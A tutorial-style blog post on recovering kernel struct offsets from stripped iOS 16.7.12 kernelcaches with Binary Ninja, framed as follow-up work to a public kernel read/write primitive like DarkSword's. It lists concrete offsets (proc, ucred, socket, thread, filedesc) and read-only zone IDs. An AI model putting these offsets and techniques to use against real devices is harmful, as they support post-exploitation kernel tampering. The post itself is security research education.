Opa334 recently shared a kernel read and write primitive which is similar to the one used in DarkSword malware. I found that it was a perfect occasion for me to try to make it run on one of my testing devices and actually get my hands dirty with kernel exploration. We always hear about kernel exploitation, but rarely get to walk through what it looks like in practice.
Once you have read and write primitives to the kernel, the first step is to read backward until you find the magic number aka the Mach-O binary signature:
uint64_t magic = early_kread64(kernel_base); if (magic == 0x100000cfeedfacf) { printf("[DEBUG] Found Mach-O magic at 0x%llx!\n", kernel_base);
Then you can compute the kernel slide and you are good to go.
I won't detail this, but feel free to check the blog post of MATTEYEUX on DarkSword.
Now the next difficulty is to find the offsets between this magic value and the kernel objects in memory. It is exactly what this post is about.
Kernelcaches extracted from IPSW files come without symbols: just raw ARM64 code. Yet, the internal layout of every kernel data structure is recoverable if you know where to look.
Note: you can use blacktop/symbolicator to recover some symbols and make your life easier.
It reminds me of this sentence from J. Levin in the DisARM book:
[...] In fact, the whole premise of the command line tools I demonstrate is to avoid having to use a debugger.
I tried to push hard on that path...
This guide documents a repeatable methodology for extracting struct offsets from stripped kernelcaches. The techniques here were validated against iOS 16.7.12 (iPhone X, build 20H364) using Binary Ninja.
I voluntarily chose not to use the Kernel Development Kit, to force myself to work directly from ARM assembly.
ipsw for extraction)Also, the pseudo non-ARM code that I'll share with you, has been modified and simplified for this post.
The key insight behind this entire methodology is that functions like proc_pid(), vnode_mount(), or kauth_cred_getuid() are wrappers that read the field from a struct. When decompiled, they directly reveal the field's offset.
A stripped kernelcache still retains the names of these exported functions.
The XNU kernel source is partially open. While the iOS build may differ from the published source, the struct layouts are usually very close. Use the source as a map, not as ground truth.
_proc_pid → p_pid)bsd/sys/proc_internal.h)| Struct | Header file |
|---|---|
proc |
bsd/sys/proc_internal.h |
vnode |
bsd/sys/vnode_internal.h |
socket |
bsd/sys/socketvar.h |
ucred |
bsd/sys/ucred.h |
task |
osfmk/kern/task.h |
thread |
osfmk/kern/thread.h |
filedesc |
bsd/sys/filedesc.h |
fileproc |
bsd/sys/file_internal.h |
fileglob |
bsd/sys/file_internal.h |
mount |
bsd/sys/mount_internal.h |
Apple frequently adds, removes, or reorders fields between iOS versions. Never assume the open-source layout matches exactly. The source tells you what fields exist; the binary tells you where they are.
For example, proc_ro (a read-only split of proc fields) exists in iOS 15.2+ but is not in older XNU source releases. If you only read the source, you would miss this entirely.
Global variables like allproc, kernproc, and nprocs are stored in the __DATA segment. They are referenced by functions via adrp/ldr instruction pairs. Finding these gives you entry points into the kernel's data structures from a known address.
ARM64 uses page-relative addressing:
adrp x8, 0xfffffff0078b7000 ; load page base ldr x8, [x8, #0x728] ; load from page + offset ; → effective address: 0xfffffff0078b7728
This is a load of the global variable at 0xfffffff0078b7728, which in the context of proc_iterate is allproc.
All addresses in the static binary are pre-slide. At boot, the kernel is loaded at a random offset (the KASLR slide). On a live device, the actual addresses will be static_address + slide. The offsets between globals remain constant.
Search for functions whose names follow the pattern <struct>_<field> or <struct>_get<field>. These are almost always thin accessors.
An accessor function decompiles to essentially one operation:
// _proc_pid at 0x5c892c return *(arg1 + 0x60);
Or in ARM64 assembly:
ldr w0, [x0, #0x60] ret
That single load instruction tells you: struct proc has p_pid at offset +0x60, and it is a 32-bit integer because the instruction is ldr w0, not ldr x0.
For example, given a target struct, search the function list for its name:
| Target struct | Search patterns |
|---|---|
proc |
proc_pid, proc_ppid, proc_ucred, proc_name, proc_task |
vnode |
vnode_vtype, vnode_mount, vnode_vid, vnode_fsnode, vnode_getname |
ucred |
kauth_cred_getuid, kauth_cred_getgid, kauth_cred_getruid |
task |
get_task_map, get_bsdtask_info, task_reference |
socket |
file_socket, soisconnecting, soisconnected |
mount |
vfs_flags, vfs_statfs |
struct ucredSearch for functions containing kauth_cred_get:
_kauth_cred_getuid → return *(arg1 + 0x18) → cr_uid at +0x18
_kauth_cred_getruid → return *(arg1 + 0x1C) → cr_ruid at +0x1C
_kauth_cred_getsvuid → return *(arg1 + 0x20) → cr_svuid at +0x20
_kauth_cred_getgid → return *(arg1 + 0x28) → cr_gid at +0x28
_kauth_cred_getrgid → return *(arg1 + 0x68) → cr_rgid at +0x68
_kauth_cred_getsvgid → return *(arg1 + 0x6C) → cr_svgid at +0x6C
Decompilers sometimes introduce confusing array indexing notation. When the decompiler shows arg1[0x15], the actual offset depends on what type it infers for arg1. Always verify against the raw disassembly.
For example, arg1[0x15a] in decompilation might mean arg1 + 0x15a * sizeof(element). But the ARM64 instruction will show the real byte offset:
; 0x5c9a40 add x0, x0, #0x579 ; This is the actual offset
When in doubt, read the assembly instructions: they are always the ground truth.
When accessor functions do not exist for a field (many internal fields are never exported), look at functions that iterate or construct instances of the struct. These functions touch many fields and reveal the overall layout.
Functions named *_iterate, *_foreach, or *_walk traverse linked lists of kernel objects. They reveal:
+0x00 for the primary list, but a struct can have multiple list entries at different offsets (e.g. proc.p_list at +0x00 vs proc.p_hash at +0xA0)nprocs, in proc_iterate)proc_iterateThis single function revealed:
| What | How | Value |
|---|---|---|
allproc global |
First data reference loaded as list head | 0xfffffff0078b7728 |
zombproc global |
Second list head (conditional on flags) | 0xfffffff0078b7730 |
nprocs global |
Loop bound variable | 0xfffffff0078b7d00 |
p_list.le_next |
i = *i (following the list) |
+0x00 |
p_pid |
Stored into pidlist array | +0x60 |
p_stat |
Compared against 1 (zombie filter) | +0x64 |
p_listflag |
Reference count manipulation | +0x464 |
Functions named *create*, *init*, or *alloc* initialize struct fields. They often set fields sequentially, revealing the struct layout in order.
For instance for the socreate_internal routine the socket creation function revealed over 20 struct fields by tracing the sequential stores to the newly allocated socket.
// x21 = newly allocated socket *(x21 + 0x18) = protosw; // so_proto *(x21 + 0x1e0) = kauth_cred; // so_cred *(x21 + 0x1e4) = proc_pid(p); // so_last_pid *(x21 + 0x1e8) = proc_uniqueid(p);// so_last_upid *(x21 + 0x288) = tpidr_el1; // so_background_thread
proc_pid()) whose return value is storedmemcpy calls that reveal embedded sub-structuresstr xzr (storing zero) to initialize pointer fieldsWhen neither accessors nor iterators exist for a field, look at the syscall implementations that operate on the struct. Syscalls are the boundary between userspace and kernel space; they must read and write kernel structs to do their work.
XNU syscall implementations follow the pattern sys_<name> or just <name> for older BSD syscalls:
| Syscall | Function name | Reveals |
|---|---|---|
chdir(2) |
sys_chdir |
filedesc.fd_cdir offset |
chroot(2) |
chroot |
filedesc.fd_rdir offset, chroot flag |
open(2) |
vn_open_auth |
fileproc/fileglob chain |
fchdir(2) |
sys_fchdir |
filedesc locking pattern |
We could for example try to access some fields of proc via sys_chdir.
The chdir syscall must update the current working directory. Decompiling it reveals:
IORWLockWrite(proc + 0x128); // fd_rw_lock old = *(proc + 0x118); // fd_cdir (old value) *(proc + 0x118) = new_vnode; // fd_cdir = new directory lck_rw_unlock_exclusive(proc + 0x128); if (old != NULL) vnode_rele(old);
This gives us three offsets from one function:
proc + 0x118 = fd_cdirproc + 0x128 = fd_rw_lockproc (no intermediate pointer)A critical question when mapping any struct: is sub-struct X a pointer to a separate allocation, or is it embedded inline?
The answer comes from how the code accesses it. If you see:
// Pointer to separate struct: fd = *(proc + SOME_OFFSET); // load a pointer cdir = *(fd + 0x18); // dereference through it // Inline (embedded): cdir = *(proc + 0x118); // direct access, no intermediate load
If there is no intermediate pointer load, the sub-struct is inline. This is exactly what we found for filedesc inside proc: the fields are at direct offsets from the proc base.
zone_require() and zone_id_require_ro() are used to validate that pointers belong to the correct memory zone. These checks reveal what zone a struct lives in and whether it is read-only.
When you see code like this:
// Inside _proc_ucred: x1 = *(arg1 + 0x18); // load proc_ro pointer zone_id_require_ro_panic(5, x1); // validate it belongs to zone #5
Then we can deduce:
proc + 0x18 is a pointer to another struct_ro suffix)By collecting all zone_id_require_ro_panic calls across the kernelcache, you can build a complete map of protected zones:
| Zone ID | Struct | Protection |
|---|---|---|
| 3 | thread_ro |
read-only |
| 5 | proc_ro |
read-only |
| 7 | ucred |
read-only |
| 0x17 | proc |
Regular zalloc (with zone_require) |
Understanding which structures are in read-only zones tells you about the kernel's security architecture. Fields that Apple moved into proc_ro are protected and cannot be modified even with a kernel read/write primitive.
Individual functions rarely traverse more than one or two pointer hops. But by combining offsets discovered in different functions, you can build paths between objects that have no direct accessor.
For example, there is no socket_get_proc() in the KPI — you cannot find the owning process of a socket with a single function search. But the path exists if you chain discoveries from earlier phases:
From socreate_internal (Phase 2): socket + 0x288 stores the creating thread (tpidr_el1)
From _current_proc (Phase 1): thread + 0x350 → thread_ro, then thread_ro + 0x10 → proc
socreate_internal _current_proc _proc_pid found in Phase 2 found in Phase 1 found in Phase 1 │ │ │ ▼ ▼ ▼ ┌──────────┐ +0x288 ┌────────────┐ +0x350 ┌────────────┐ +0x10 ┌──────────┐ +0x60 │ socket │ ───────→ │ thread │ ──────→ │ thread_ro │ ─────→ │ proc │ ─────→ p_pid └──────────┘ └────────────┘ └────────────┘ └──────────┘ (tpidr_el1) (zone RO #3)
Neither function knows about the other. But combining them gives you a three-hop path from any socket to its owning process — something you could never find by searching function names alone.
This is where the work becomes cumulative: every offset you confirmed in Phases 1–5 is a building block. The more you have, the more paths you can construct.
Some kernel lookups use hash tables instead of linked lists. The hash function and table structure can be recovered from the lookup function.
_proc_find_proc_find takes a PID and returns the corresponding proc. Decompiling it reveals:
The hash entry lives at proc + 0xA0, which means the proc struct has a LIST_ENTRY at that offset for chaining in the hash table. The PID comparison happens at hash_entry - 0xA0 + 0x60, confirming p_pid at +0x60 from another angle.
If you find proc_pid at +0x60, proc_ppid at +0x20, and proc_pgrpid at +0x28, you know the PID-related fields are clustered in the +0x20–0x68 region. This helps you predict where other related fields might be, and focus your search.
zalloc_ro_mutWhen zalloc_ro_mut(zone_id, ptr, offset, src, size) is called, the size parameter tells you the total size of the read-only struct. For example, proc_ro is 0x80 bytes.
| Instruction | What it tells you |
|---|---|
ldr x0, [x1, #0x60] |
64-bit load from offset 0x60 |
ldr w0, [x1, #0x60] |
32-bit load from offset 0x60 |
ldrh w0, [x1, #0x70] |
16-bit load from offset 0x70 |
ldrb w0, [x1, #0x64] |
8-bit load from offset 0x64 |
str x2, [x1, #0x18] |
64-bit store at offset 0x18 |
add x0, x1, #0x579 |
Compute address at offset 0x579 (often for strings/arrays) |
stp x2, x3, [x1, #0x50] |
Store pair: 64-bit values at +0x50 and +0x58 |
adrp x8, PAGE then ldr x8, [x8, #OFF] |
Global variable load at PAGE+OFF |
mrs x0, tpidr_el1 |
Load current thread pointer |
The ARM64 instruction tells you the field size:
ldr x / str x → 8 bytes (pointer, uint64)ldr w / str w → 4 bytes (int32, uint32, pid_t)ldrh / strh → 2 bytes (uint16, short)ldrb / strb → 1 byte (uint8, char, bool)